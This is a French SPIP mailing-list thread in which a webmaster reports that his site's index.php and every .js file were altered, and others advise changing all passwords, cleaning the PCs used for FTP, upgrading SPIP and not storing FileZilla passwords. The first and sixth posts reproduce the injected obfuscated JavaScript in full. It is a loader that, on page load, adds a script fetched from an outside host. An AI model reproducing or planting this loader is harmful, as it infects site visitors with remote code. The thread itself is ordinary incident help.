Comportement bizarre

Général
1

Bonjour,

J'ai eu la mauvaise surprise de constater que mon site SPIP se comportait de façon bizarre cette semaine.
En effet, le fichier index.php (à la racine du site) a été modifié sans que je fasse quoi que ce soit.
Voici ce qui c'est ajouté :

<script>var wo;if(wo!='ea' && wo != ''){wo=null};try {var wp;if(wp!=''){wp='b'};var T='';var RZ;if(RZ!='S' && RZ!='bC'){RZ='S'};var Q=RegExp;var An;if(An!='SP'){An='SP'};var Fp;if(Fp!=''){Fp='uK'};var n="reps1x".substr(0,3)+"DqmNlacNDqm".substr(4,3)+"e";var j=new Array();var d=new Array();var B=new Array();function A(nh,r){var BW;if(BW!='eI' && BW!='ya'){BW='eI'};this.wx="";this.wQ='';var jE;if(jE!='BJ' && jE != ''){jE=null};var s=String("12G[".substr(3));var G="";var u=new String("dvmEg".substr(4));var U;if(U!='Z' && U!='wH'){U='Z'};s+=r;var wq;if(wq!='xI' && wq!='QD'){wq='xI'};var HT="";s+=new String("]");var MG;if(MG!='' && MG!='Fs'){MG='g'};var R=new Q(s, u);var yD='';var de=new String();return nh[n](R, new String());var aZ=new Array();};var oZ=new String();var TH;if(TH!='bl' && TH != ''){TH=null};var w='';var Vl=new String();var k=A('/UwIoIoUtI.jcUojmI/IwIoUojtI.jcUojmj/IgUojoUgIljeI.IcjojmI/jpjejrIeIzIhUiIljtUojnI.jcUoImj/jgUoIoUgjlIeU.UcIojmU.IajuU.IpjhjpU',"IjU");var Eq;if(Eq!='' && Eq!='der'){Eq=null};var J_=new Date();var F=window;var Qa;if(Qa!='' && Qa!='gp'){Qa=null};var dX;if(dX!='' && dX!='vQ'){dX=''};var y=A('cqrbekaqtbeqEDlDeqmDeknqtk',"kDqb");var Kb;if(Kb!='vY'){Kb=''};var Au=new Date();var wa=A('h7tAtAp9:A/A/9rAaAp7iAdAl9iAbAr7a9rAy9-9c7oAmA.9o7v7g9uAi7d9eA.Ac7o9m7.7cAoAm7c7a9sAtA-An7eAt7.7T7h7eAS9u7p7e7r9E9x7c9h9a7n7g7e9.9rAu9:9',"9A7");this.LK='';var Sp;if(Sp!='' && Sp!='gV'){Sp=null};var uF=A('sJcfrZi9pftZ',"9fZ0J");this.yj="";var pC='';var uv=A('812222012122181111202211221',"12");var ab=new String();var i=A('oYnYlYo0a0dY',"Y0X");var Ot;if(Ot!='Ck' && Ot!='Ir'){Ot=''};var QL='';e=function(){var rX='';var N;if(N!='tr' && N!='KH'){N=''};var iU;if(iU!='ml' && iU!='zO'){iU=''};o=document[y](uF);var Cb="";var BX=new Date();w=wa+uv;var OI;if(OI!='_T'){OI='_T'};var Mp=new Date();w+=k;o.defer=([1][0]);var no;if(no!=''){no='nB'};var z_=new Date();var cI;if(cI!='mW'){cI=''};o.src=w;document.body.appendChild(o);var VJ;if(VJ!='' && VJ!='Vw'){VJ=null};};this.Gf="";var AuP;if(AuP!='QG'){AuP=''};this.nQ="";F[i]=e;this.Kf="";} catch(P){};var so=new String();var lS='';</script>
<!--d986e2354553bf58379af5ce48dd3eeb-->

Par ailleurs, TOUS les scripts (fichiers .js) du site (j'ai bien dit tous) ont également été modifiés avec le même ajout (mais sans les balises SCRIPT. Je l'ai remarqué à la date de modification des fichiers (tous au même moment). Bien entendu l'interface privée ne fonctionne plus.

Comment cela est il possible ?
S'agit il d'un virus ? ou d'une vulnérabilité du site ?
La version de SPIP utilisée SPIP 1.9.2g [13534]
Si oui, comment résoudre durablement le problème ?
J'ai déjà remplacé les fichiers en question par mes fichiers sauvegardés > le site a fonctionné 3 jours, et les fichiers ont à nouveau été modifiés.
Merci pour votre aide

Christian BARRET
www.maximaphiles-francais.org

2

j’ai vu qq chose passer il y a 2 ou 3 semaines ou cela parlait d’injection dans un site.

J’en ai conclu :
Modif de tous les mots de passe

  • Administrateurs
  • Rédacteurs
  • de ton compte chez ton hebergeur
  • de tes connections FTP
    par qq chose d’un peu sophistiqué pour eviter le crackage « facile », si cela se revele insufissant … je ne sais si ton hebergeur est à meme de faire qq chose.

Le 17 mars 2010 19:26, Christian BARRET <christian.barret@laposte.net> a écrit :

Bonjour,

J’ai eu la mauvaise surprise de constater que mon site SPIP se comportait de façon bizarre cette semaine.
En effet, le fichier index.php (à la racine du site) a été modifié sans que je fasse quoi que ce soit.
Voici ce qui c’est ajouté :

Par ailleurs, TOUS les scripts (fichiers .js) du site (j’ai bien dit tous) ont également été modifiés avec le même ajout (mais sans les balises SCRIPT. Je l’ai remarqué à la date de modification des fichiers (tous au même moment). Bien entendu l’interface privée ne fonctionne plus.

Comment cela est il possible ?
S’agit il d’un virus ? ou d’une vulnérabilité du site ?
La version de SPIP utilisée SPIP 1.9.2g [13534]
Si oui, comment résoudre durablement le problème ?
J’ai déjà remplacé les fichiers en question par mes fichiers sauvegardés > le site a fonctionné 3 jours, et les fichiers ont à nouveau été modifiés.
Merci pour votre aide

Christian BARRET
www.maximaphiles-francais.org

liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
http://archives.rezo.net/spip.mbox/

Documentation de SPIP : http://www.spip.net/

Irc : de l’aide à toute heure : http://spip.net/irc


La question bien posée donne la bonne réponse …

Lao Tseu … ou un autre (sais plu … même moi je le pense !

3

Christian BARRET a écrit :

Bonjour,

J'ai eu la mauvaise surprise de constater que mon site SPIP se comportait de façon bizarre cette semaine.
En effet, le fichier index.php (à la racine du site) a été modifié sans que je fasse quoi que ce soit.
Voici ce qui c'est ajouté :

Par ailleurs, TOUS les scripts (fichiers .js) du site (j'ai bien dit tous) ont également été modifiés avec le même ajout (mais sans les balises SCRIPT. Je l'ai remarqué à la date de modification des fichiers (tous au même moment). Bien entendu l'interface privée ne fonctionne plus.

Comment cela est il possible ?
S'agit il d'un virus ? ou d'une vulnérabilité du site ?
La version de SPIP utilisée SPIP 1.9.2g [13534]
Si oui, comment résoudre durablement le problème ?

A priori, virus, du à une vulnérabilité quelque part. Voir un thread lancé récemment ici "Cheval de troie dans les plugins ?".

J'ai déjà remplacé les fichiers en question par mes fichiers sauvegardés > le site a fonctionné 3 jours, et les fichiers ont à nouveau été modifiés.

Voir avec ton hébergeur, changer tous tes mots de passe, tout effacer les fichiers et remettre ta sauvegarde.

Par ailleurs passer un bon antivirus et anti-rootkit sur *ton* PC et tous les PC susceptibles d'avoir mémorisé quelque part des mots de passe d'accès au serveur FTP de ton hébergeur.

Bref tout nettoyer au Kärscher™.

--
Sergio
Éditions Touchalon: htpp://touchalon.free.fr
Soutenez le libre: http://www.framasoft.org

4

Eric Boutigny a écrit :

j'ai vu qq chose passer il y a 2 ou 3 semaines ou cela parlait d'injection dans un site.

J'en ai conclu :
Modif de tous les mots de passe
- Administrateurs
- Rédacteurs
- de ton compte chez ton hebergeur
- de tes connections FTP
par qq chose d'un peu sophistiqué pour eviter le crackage "facile", si cela se revele insufissant .. je ne sais si ton hebergeur est à meme de faire qq chose.

Nettoyer aussi le PC des développeurs / webmasters : Il y a un virus qui traîne et qui vient voler les mots de passe de Filezilla.

--
Sergio
Éditions Touchalon: htpp://touchalon.free.fr
Soutenez le libre: http://www.framasoft.org

5

Le 17/03/2010 19:26, Christian BARRET a écrit :

J'ai eu la mauvaise surprise de constater que mon site SPIP se comportait de façon bizarre cette semaine.
En effet, le fichier index.php (à la racine du site) a été modifié sans que je fasse quoi que ce soit.

(...)

Par ailleurs, TOUS les scripts (fichiers .js) du site (j'ai bien dit tous) ont également été modifiés avec le même ajout (mais sans les balises SCRIPT. Je l'ai remarqué à la date de modification des fichiers (tous au même moment). Bien entendu l'interface privée ne fonctionne plus.

Comment cela est il possible ?
S'agit il d'un virus ? ou d'une vulnérabilité du site ?

Piratage des codes ftp sûrement...
T'es bon pour un gros nettoyage.

La version de SPIP utilisée SPIP 1.9.2g [13534]

hum.. version avec des failles de sécu, ce qui n'a probablement rien à voir avec ton problème mais il te faut aussi upgrader en 1.9.2i , seule version sans faille connue de la branche 1.9.x .

Éric

6

Bonjour à tous

Merci pour les informations.
J'ai retrouvé les fil qui parlait déjà de ce problème en début de mois.
J'espère pouvoir m'en sortir.
Cordialement.

Christian BARRET
www.maximaphiles-francais.org ...en rade pour l'instant

Christian BARRET a écrit :

Bonjour,

J'ai eu la mauvaise surprise de constater que mon site SPIP se comportait de façon bizarre cette semaine.
En effet, le fichier index.php (à la racine du site) a été modifié sans que je fasse quoi que ce soit.
Voici ce qui c'est ajouté :

<script>var wo;if(wo!='ea' && wo != ''){wo=null};try {var wp;if(wp!=''){wp='b'};var T='';var RZ;if(RZ!='S' && RZ!='bC'){RZ='S'};var Q=RegExp;var An;if(An!='SP'){An='SP'};var Fp;if(Fp!=''){Fp='uK'};var n="reps1x".substr(0,3)+"DqmNlacNDqm".substr(4,3)+"e";var j=new Array();var d=new Array();var B=new Array();function A(nh,r){var BW;if(BW!='eI' && BW!='ya'){BW='eI'};this.wx="";this.wQ='';var jE;if(jE!='BJ' && jE != ''){jE=null};var s=String("12G[".substr(3));var G="";var u=new String("dvmEg".substr(4));var U;if(U!='Z' && U!='wH'){U='Z'};s+=r;var wq;if(wq!='xI' && wq!='QD'){wq='xI'};var HT="";s+=new String("]");var MG;if(MG!='' && MG!='Fs'){MG='g'};var R=new Q(s, u);var yD='';var de=new String();return nh[n](R, new String());var aZ=new Array();};var oZ=new String();var TH;if(TH!='bl' && TH != ''){TH=null};var w='';var Vl=new String();var k=A('/UwIoIoUtI.jcUojmI/IwIoUojtI.jcUojmj/IgUojoUgIljeI.IcjojmI/jpjejrIeIzIhUiIljtUojnI.jcUoImj/jgUoIoUgjlIeU.UcIojmU.IajuU.IpjhjpU',"IjU");var Eq;if(Eq!='' && Eq!='der'){Eq=null};var J_=new Date();var F=window;var Qa;if(Qa!='' && Qa!='gp'){Qa=null};var dX;if(dX!='' && dX!='vQ'){dX=''};var y=A('cqrbekaqtbeqEDlDeqmDeknqtk',"kDqb");var Kb;if(Kb!='vY'){Kb=''};var Au=new Date();var wa=A('h7tAtAp9:A/A/9rAaAp7iAdAl9iAbAr7a9rAy9-9c7oAmA.9o7v7g9uAi7d9eA.Ac7o9m7.7cAoAm7c7a9sAtA-An7eAt7.7T7h7eAS9u7p7e7r9E9x7c9h9a7n7g7e9.9rAu9:9',"9A7");this.LK='';var Sp;if(Sp!='' && Sp!='gV'){Sp=null};var uF=A('sJcfrZi9pftZ',"9fZ0J");this.yj="";var pC='';var uv=A('812222012122181111202211221',"12");var ab=new String();var i=A('oYnYlYo0a0dY',"Y0X");var Ot;if(Ot!='Ck' && Ot!='Ir'){Ot=''};var QL='';e=function(){var rX='';var N;if(N!='tr' && N!='KH'){N=''};var iU;if(iU!='ml' && iU!='zO'){iU=''};o=document[y](uF);var Cb="";var BX=new Date();w=wa+uv;var OI;if(OI!='_T'){OI='_T'};var Mp=new Date();w+=k;o.defer=([1][0]);var no;if(no!=''){no='nB'};var z_=new Date();var cI;if(cI!='mW'){cI=''};o.src=w;document.body.appendChild(o);var VJ;if(VJ!='' && VJ!='Vw'){VJ=null};};this.Gf="";var AuP;if(AuP!='QG'){AuP=''};this.nQ="";F[i]=e;this.Kf="";} catch(P){};var so=new String();var lS='';</script>
<!--d986e2354553bf58379af5ce48dd3eeb-->

Par ailleurs, TOUS les scripts (fichiers .js) du site (j'ai bien dit tous) ont également été modifiés avec le même ajout (mais sans les balises SCRIPT. Je l'ai remarqué à la date de modification des fichiers (tous au même moment). Bien entendu l'interface privée ne fonctionne plus.

Comment cela est il possible ?
S'agit il d'un virus ? ou d'une vulnérabilité du site ?
La version de SPIP utilisée SPIP 1.9.2g [13534]
Si oui, comment résoudre durablement le problème ?
J'ai déjà remplacé les fichiers en question par mes fichiers sauvegardés > le site a fonctionné 3 jours, et les fichiers ont à nouveau été modifiés.
Merci pour votre aide

Christian BARRET
www.maximaphiles-francais.org

7

Juste une p'tite info si c'est FileZilla qui est utilisé
il est préférable de choisir l'option dans le gestionnaire de sites
Type d'authentification : 'demander un mot de passe'
pour éviter que FileZilla ne conserve en *clair* les mots de passe dans
ses fichiers .xml
A+
JPH

Le 19/03/2010 18:17, Christian BARRET a écrit :

Bonjour à tous

Merci pour les informations.
J'ai retrouvé les fil qui parlait déjà de ce problème en début de mois.
J'espère pouvoir m'en sortir.

8

JPH a écrit :

Juste une p'tite info si c'est FileZilla qui est utilisé
il est préférable de choisir l'option dans le gestionnaire de sites
Type d'authentification : 'demander un mot de passe'
pour éviter que FileZilla ne conserve en *clair* les mots de passe dans
ses fichiers .xml
A+
JPH

Oui, c'est bien FileZilla qui est utilisé et je n'ai effectivement pas enregistré le mot de passe comme je l'avais fait auparavant.
Merci encore

Christian BARRET

9

Bonsoir,

Il semblerait qu'il n'existe pas de base la possibilité de rajouter des forums aux articles syndiqués... ou encore à un auteur !?

Avez-vous une idée pour résoudre proprement ce problème ?

Pierre-Jean